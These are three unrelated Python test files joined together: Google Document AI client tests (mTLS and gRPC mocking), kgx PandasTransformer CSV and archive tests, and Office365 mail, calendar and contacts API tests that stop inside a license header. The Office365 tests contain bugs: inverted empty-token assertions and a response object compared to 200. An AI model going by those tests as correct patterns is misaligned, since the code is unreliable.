# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "never".
os.environ["GOOGLE_API_USE_MTLS"] = "never"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS is
# "always".
os.environ["GOOGLE_API_USE_MTLS"] = "always"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and client_cert_source is provided.
os.environ["GOOGLE_API_USE_MTLS"] = "auto"
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=client_cert_source_callback,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", and default_client_cert_source is provided.
os.environ["GOOGLE_API_USE_MTLS"] = "auto"
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
api_mtls_endpoint=client.DEFAULT_MTLS_ENDPOINT,
client_cert_source=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
)
# Check the case api_endpoint is not provided, GOOGLE_API_USE_MTLS is
# "auto", but client_cert_source and default_client_cert_source are None.
os.environ["GOOGLE_API_USE_MTLS"] = "auto"
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
api_mtls_endpoint=client.DEFAULT_ENDPOINT,
client_cert_source=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS has
# unsupported value.
os.environ["GOOGLE_API_USE_MTLS"] = "Unsupported"
with pytest.raises(MutualTLSChannelError):
client = client_class()
del os.environ["GOOGLE_API_USE_MTLS"]
def test_document_understanding_service_client_client_options_from_dict():
with mock.patch(
"google.cloud.documentai_v1beta2.services.document_understanding_service.transports.DocumentUnderstandingServiceGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = DocumentUnderstandingServiceClient(
client_options={"api_endpoint": "squid.clam.whelk"}
)
grpc_transport.assert_called_once_with(
api_mtls_endpoint="squid.clam.whelk",
client_cert_source=None,
credentials=None,
host="squid.clam.whelk",
)
def test_batch_process_documents(transport: str = "grpc"):
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(), transport=transport
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = document_understanding.BatchProcessDocumentsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.batch_process_documents), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.batch_process_documents(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_batch_process_documents_async(transport: str = "grpc_asyncio"):
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = document_understanding.BatchProcessDocumentsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.batch_process_documents), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.batch_process_documents(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_batch_process_documents_field_headers():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = document_understanding.BatchProcessDocumentsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.batch_process_documents), "__call__"
) as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.batch_process_documents(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
@pytest.mark.asyncio
async def test_batch_process_documents_field_headers_async():
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = document_understanding.BatchProcessDocumentsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.batch_process_documents), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.batch_process_documents(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
def test_batch_process_documents_flattened():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials()
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.batch_process_documents), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.batch_process_documents(
requests=[
document_understanding.ProcessDocumentRequest(parent="parent_value")
]
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].requests == [
document_understanding.ProcessDocumentRequest(parent="parent_value")
]
def test_batch_process_documents_flattened_error():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials()
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.batch_process_documents(
document_understanding.BatchProcessDocumentsRequest(),
requests=[
document_understanding.ProcessDocumentRequest(parent="parent_value")
],
)
@pytest.mark.asyncio
async def test_batch_process_documents_flattened_async():
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials()
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.batch_process_documents), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.batch_process_documents(
requests=[
document_understanding.ProcessDocumentRequest(parent="parent_value")
]
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].requests == [
document_understanding.ProcessDocumentRequest(parent="parent_value")
]
@pytest.mark.asyncio
async def test_batch_process_documents_flattened_error_async():
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials()
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.batch_process_documents(
document_understanding.BatchProcessDocumentsRequest(),
requests=[
document_understanding.ProcessDocumentRequest(parent="parent_value")
],
)
def test_process_document(transport: str = "grpc"):
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(), transport=transport
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = document_understanding.ProcessDocumentRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.process_document), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = document.Document(
uri="uri_value",
content=b"content_blob",
mime_type="mime_type_value",
text="text_value",
)
response = client.process_document(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, document.Document)
assert response.uri == "uri_value"
assert response.content == b"content_blob"
assert response.mime_type == "mime_type_value"
assert response.text == "text_value"
@pytest.mark.asyncio
async def test_process_document_async(transport: str = "grpc_asyncio"):
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = document_understanding.ProcessDocumentRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.process_document), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
document.Document(
uri="uri_value",
content=b"content_blob",
mime_type="mime_type_value",
text="text_value",
)
)
response = await client.process_document(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, document.Document)
assert response.uri == "uri_value"
assert response.content == b"content_blob"
assert response.mime_type == "mime_type_value"
assert response.text == "text_value"
def test_process_document_field_headers():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = document_understanding.ProcessDocumentRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.process_document), "__call__"
) as call:
call.return_value = document.Document()
client.process_document(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
@pytest.mark.asyncio
async def test_process_document_field_headers_async():
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = document_understanding.ProcessDocumentRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.process_document), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(document.Document())
await client.process_document(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value") in kw["metadata"]
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.DocumentUnderstandingServiceGrpcTransport(
credentials=credentials.AnonymousCredentials()
)
with pytest.raises(ValueError):
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(), transport=transport
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.DocumentUnderstandingServiceGrpcTransport(
credentials=credentials.AnonymousCredentials()
)
client = DocumentUnderstandingServiceClient(transport=transport)
assert client._transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.DocumentUnderstandingServiceGrpcTransport(
credentials=credentials.AnonymousCredentials()
)
channel = transport.grpc_channel
assert channel
transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
credentials=credentials.AnonymousCredentials()
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials()
)
assert isinstance(
client._transport, transports.DocumentUnderstandingServiceGrpcTransport
)
def test_document_understanding_service_base_transport():
# Instantiate the base transport.
transport = transports.DocumentUnderstandingServiceTransport(
credentials=credentials.AnonymousCredentials()
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = ("batch_process_documents", "process_document")
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
def test_document_understanding_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
DocumentUnderstandingServiceClient()
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",)
)
def test_document_understanding_service_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
transports.DocumentUnderstandingServiceGrpcTransport(host="squid.clam.whelk")
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",)
)
def test_document_understanding_service_host_no_port():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="us-documentai.googleapis.com"
),
)
assert client._transport._host == "us-documentai.googleapis.com:443"
def test_document_understanding_service_host_with_port():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="us-documentai.googleapis.com:8000"
),
)
assert client._transport._host == "us-documentai.googleapis.com:8000"
def test_document_understanding_service_grpc_transport_channel():
channel = grpc.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
transport = transports.DocumentUnderstandingServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
def test_document_understanding_service_grpc_asyncio_transport_channel():
channel = aio.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_document_understanding_service_grpc_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.DocumentUnderstandingServiceGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_document_understanding_service_grpc_asyncio_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_document_understanding_service_grpc_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.DocumentUnderstandingServiceGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_document_understanding_service_grpc_asyncio_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.DocumentUnderstandingServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
ssl_credentials=mock_ssl_cred,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
)
assert transport.grpc_channel == mock_grpc_channel
def test_document_understanding_service_grpc_lro_client():
client = DocumentUnderstandingServiceClient(
credentials=credentials.AnonymousCredentials(), transport="grpc"
)
transport = client._transport
# Ensure that we have a api-core operations client.
assert isinstance(transport.operations_client, operations_v1.OperationsClient)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_document_understanding_service_grpc_lro_async_client():
client = DocumentUnderstandingServiceAsyncClient(
credentials=credentials.AnonymousCredentials(), transport="grpc_asyncio"
)
transport = client._client._transport
# Ensure that we have a api-core operations client.
assert isinstance(transport.operations_client, operations_v1.OperationsAsyncClient)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
|
import os
from kgx import PandasTransformer
cwd = os.path.abspath(os.path.dirname(__file__))
resource_dir = os.path.join(cwd, 'resources')
target_dir = os.path.join(cwd, 'target')
def test_load():
"""
Test for loading data into PandasTransformer
"""
t = PandasTransformer()
os.makedirs(target_dir, exist_ok=True)
t.parse(os.path.join(resource_dir, "x1_nodes.csv"), input_format='csv')
t.parse(os.path.join(resource_dir, "x1_edges.csv"), input_format='csv')
t.report()
t.save(os.path.join(target_dir, 'x1copy'))
# w = GraphMLTransformer(t.graph)
# w.save(os.path.join(target_dir, "x1n.graphml"))
def test_semmeddb_csv():
"""
Read nodes and edges from CSV and export the resulting graph as an archive
"""
t = PandasTransformer()
nodes_file = os.path.join(resource_dir, "semmed/semmeddb_test_nodes.csv")
edges_file = os.path.join(resource_dir, "semmed/semmeddb_test_edges.csv")
output = os.path.join(target_dir, "semmeddb_test_export")
t.parse(nodes_file)
t.parse(edges_file)
# save output as *.tar
t.save(output, output_format='csv', compression='tar')
# save output as *.tar.gz
t.save(output, output_format='csv', compression='tar.gz')
# save output as *tar.bz2
t.save(output, output_format='csv', compression='tar.bz2')
def test_semmeddb_csv_to_tsv():
"""
Read nodes and edges from CSV and export the resulting graph as an archive
"""
t = PandasTransformer()
nodes_file = os.path.join(resource_dir, "semmed/semmeddb_test_nodes.csv")
edges_file = os.path.join(resource_dir, "semmed/semmeddb_test_edges.csv")
output = os.path.join(target_dir, "semmeddb_test_tsv_export")
t.parse(nodes_file)
t.parse(edges_file)
# save output as TSV in a tar archive
t.save(output, output_format='tsv', compression='tar')
def test_read_achive():
"""
Test reading of tar, tar.gz and tar.bz2 archives
"""
tar_file = os.path.join(target_dir, "semmeddb_test_export.tar")
tar_gz_file = os.path.join(target_dir, "semmeddb_test_export.tar.gz")
tar_bz_file = os.path.join(target_dir, "semmeddb_test_export.tar.bz2")
pt = PandasTransformer()
pt.parse(tar_file, input_format='csv', compression='tar')
assert not pt.is_empty()
pt2 = PandasTransformer()
pt2.parse(tar_gz_file, input_format='csv', compression='tar.gz')
assert not pt2.is_empty()
pt3 = PandasTransformer()
pt3.parse(tar_bz_file, input_format='csv', compression='tar.bz2')
assert not pt3.is_empty()
|
# Copyright (c) Microsoft. All rights reserved. Licensed under the MIT license. See full license at the bottom of this file.
from django.test import TestCase
from django.core.exceptions import ObjectDoesNotExist
from contacts.models import Office365Connection
import contacts.o365service
# Create your tests here.
api_endpoint = 'https://outlook.office365.com/api/v1.0'
# TODO: Copy a valid, non-expired access token here. You can get this from
# an Office365Connection in the /admin/ page once you've successfully connected
# an account to view contacts in the app. Remember these expire every hour, so
# if you start getting 401's you need to get a new token.
access_token = ''
class MailApiTests(TestCase):
def test_create_message(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
new_message_payload = '{ "Subject": "Did you see last night\'s game?", "Importance": "Low", "Body": { "ContentType": "HTML", "Content": "They were <b>awesome</b>!" }, "ToRecipients": [ { "EmailAddress": { "Address": "jasonjoh@alpineskihouse.com" } } ] }'
r = contacts.o365service.create_message(api_endpoint,
access_token,
new_message_payload)
self.assertEqual(r, 201, 'Create message returned {0}'.format(r))
def test_get_message_by_id(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_messages_params = '?$top=5&$select=Subject'
r = contacts.o365service.get_messages(api_endpoint,
access_token,
get_messages_params)
self.assertIsNotNone(r, 'Get messages returned None.')
first_message = r['value'][0]
first_message_id = first_message['Id']
r = contacts.o365service.get_message_by_id(api_endpoint,
access_token,
first_message_id)
self.assertIsNotNone(r, 'Get message by id returned None.')
def test_update_message(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_messages_params = '?$top=5&$select=Subject'
r = contacts.o365service.get_messages(api_endpoint,
access_token,
get_messages_params)
self.assertIsNotNone(r, 'Get messages returned None.')
first_message = r['value'][0]
first_message_id = first_message['Id']
update_payload = '{ "Subject" : "UPDATED" }'
r = contacts.o365service.update_message(api_endpoint,
access_token,
first_message_id,
update_payload)
self.assertEqual(r, 200, 'Update message returned {0}.'.format(r))
def test_delete_message(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_messages_params = '?$top=5&$select=Subject'
r = contacts.o365service.get_messages(api_endpoint,
access_token,
get_messages_params)
self.assertIsNotNone(r, 'Get messages returned None.')
first_message = r['value'][0]
first_message_id = first_message['Id']
r = contacts.o365service.delete_message(api_endpoint,
access_token,
first_message_id)
self.assertEqual(r, 204, 'Delete message returned {0}.'.format(r))
def test_send_draft_message(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
# Get drafts
get_drafts = '{0}/Me/Folders/Drafts/Messages?$select=Subject'.format(api_endpoint)
r = contacts.o365service.make_api_call('GET', get_drafts, access_token)
response = r.json()
first_message = response['value'][0]
first_message_id = first_message['Id']
send_response = contacts.o365service.send_draft_message(api_endpoint,
access_token,
first_message_id)
self.assertEqual(r, 200, 'Send draft returned {0}.'.format(r))
def test_send_new_mail(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
new_message_payload = '{ "Subject": "Sent from test_send_new_mail", "Importance": "Low", "Body": { "ContentType": "HTML", "Content": "They were <b>awesome</b>!" }, "ToRecipients": [ { "EmailAddress": { "Address": "allieb@jasonjohtest.onmicrosoft.com" } } ] }'
r = contacts.o365service.send_new_message(api_endpoint,
access_token,
new_message_payload,
True)
self.assertEqual(r, 202, 'Send new message returned {0}.'.format(r))
class CalendarApiTests(TestCase):
def test_create_event(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
new_event_payload = '{ "Subject": "Discuss the Calendar REST API", "Body": { "ContentType": "HTML", "Content": "I think it will meet our requirements!" }, "Start": "2015-01-15T18:00:00Z", "End": "2015-01-15T19:00:00Z", "Attendees": [ { "EmailAddress": { "Address": "alexd@alpineskihouse.com", "Name": "Alex Darrow" }, "Type": "Required" } ] }'
r = contacts.o365service.create_event(api_endpoint,
access_token,
new_event_payload)
self.assertEqual(r, 201, 'Create event returned {0}'.format(r))
def test_get_event_by_id(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_events_params = '?$top=5&$select=Subject,Start,End'
r = contacts.o365service.get_events(api_endpoint,
access_token,
get_events_params)
self.assertIsNotNone(r, 'Get events returned None.')
first_event = r['value'][0]
first_event_id = first_event['Id']
r = contacts.o365service.get_event_by_id(api_endpoint,
access_token,
first_event_id)
self.assertIsNotNone(r, 'Get event by id returned None.')
def test_update_event(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_events_params = '?$top=5&$select=Subject,Start,End'
r = contacts.o365service.get_events(api_endpoint,
access_token,
get_events_params)
self.assertIsNotNone(r, 'Get events returned None.')
first_event = r['value'][0]
first_event_id = first_event['Id']
update_payload = '{ "Subject" : "UPDATED" }'
r = contacts.o365service.update_event(api_endpoint,
access_token,
first_event_id,
update_payload)
self.assertEqual(r, 200, 'Update event returned {0}.'.format(r))
def test_delete_event(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_events_params = '?$top=5&$select=Subject,Start,End'
r = contacts.o365service.get_events(api_endpoint,
access_token,
get_events_params)
self.assertIsNotNone(r, 'Get events returned None.')
first_event = r['value'][0]
first_event_id = first_event['Id']
r = contacts.o365service.delete_event(api_endpoint,
access_token,
first_event_id)
self.assertEqual(r, 204, 'Delete event returned {0}.'.format(r))
class ContactsApiTests(TestCase):
def test_create_contact(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
new_contact_payload = '{ "GivenName": "Pavel", "Surname": "Bansky", "EmailAddresses": [ { "Address": "pavelb@alpineskihouse.com", "Name": "Pavel Bansky" } ], "BusinessPhones": [ "+1 732 555 0102" ] }'
r = contacts.o365service.create_contact(api_endpoint,
access_token,
new_contact_payload)
self.assertEqual(r, 201, 'Create contact returned {0}'.format(r))
def test_get_contact_by_id(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_contacts_params = '?$top=5&$select=DisplayName'
r = contacts.o365service.get_contacts(api_endpoint,
access_token,
get_contacts_params)
self.assertIsNotNone(r, 'Get contacts returned None.')
first_contact = r['value'][0]
first_contact_id = first_contact['Id']
r = contacts.o365service.get_contact_by_id(api_endpoint,
access_token,
first_contact_id)
self.assertIsNotNone(r, 'Get contact by id returned None.')
def test_update_contact(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_contacts_params = '?$top=5&$select=DisplayName'
r = contacts.o365service.get_contacts(api_endpoint,
access_token,
get_contacts_params)
self.assertIsNotNone(r, 'Get contacts returned None.')
first_contact = r['value'][0]
first_contact_id = first_contact['Id']
update_payload = '{ "Surname" : "UPDATED" }'
r = contacts.o365service.update_contact(api_endpoint,
access_token,
first_contact_id,
update_payload)
self.assertEqual(r, 200, 'Update contact returned {0}.'.format(r))
def test_delete_contact(self):
self.assertEqual(access_token, '', 'You must copy a valid access token into the access_token variable.')
get_contacts_params = '?$top=5&$select=DisplayName'
r = contacts.o365service.get_contacts(api_endpoint,
access_token,
get_contacts_params)
self.assertIsNotNone(r, 'Get contacts returned None.')
first_contact = r['value'][0]
first_contact_id = first_contact['Id']
r = contacts.o365service.delete_contact(api_endpoint,
access_token,
first_contact_id)
self.assertEqual(r, 204, 'Delete contact returned {0}.'.format(r))
# MIT License:
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# ""Software""), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
